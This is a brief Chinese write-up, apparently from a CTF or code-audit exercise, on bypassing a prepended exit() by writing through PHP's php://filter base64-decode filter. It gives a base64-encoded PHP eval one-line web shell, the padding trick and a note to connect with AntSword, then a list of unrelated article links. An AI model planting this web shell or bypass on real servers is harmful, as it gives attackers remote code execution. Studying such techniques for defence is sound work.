代码审计,发现写进去的东西会加上exit,这样的话后面的内容就不能执,那就写个过滤器进行绕过,重点是考虑一下base64的解码位置,构造一句话木马,
使用base64的话
<?php eval($_POST['a']);
Base64 编码后:PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7
需要给前面随便补充一位,过滤器是php://filter/write=convert.base64-decode/resource=shell.php
写入成功后用蚁剑连接
相关推荐
汤愈韬6 分钟前
vlan间通信之vlanif虚接口、vlan聚合孪生引擎观星台15 分钟前
数字孪生如何破解效率、性能与安全困局?AI绘画小331 小时前
【网络安全】IP 核心技能:获取、伪造、隐藏与挖掘介一安全1 小时前
【Frida Android】实战篇7:SSL Pinning 证书绑定绕过 Hook 教程阶段总结Whoami!1 小时前
⸢ 拾陆-V⸥⤳ 安全数智化建设:安全智能平台(上)▸概述虹科网络安全1 小时前
从AI模型到云生态:构建系统化的企业AI安全管理体系【系列文章(1)】o***Z4481 小时前
Docker镜像安全扫描@CLoudbays_Martin111 小时前
钓鱼网站应该怎么判断?简道云平台2 小时前
如何2小时搭建一套工程项目安全巡检管理系统MCM-RL1111112 小时前
自由落体颅脑损伤打击器 自由落体打击器 脑损伤打击器 自由颅脑损伤落体操作臂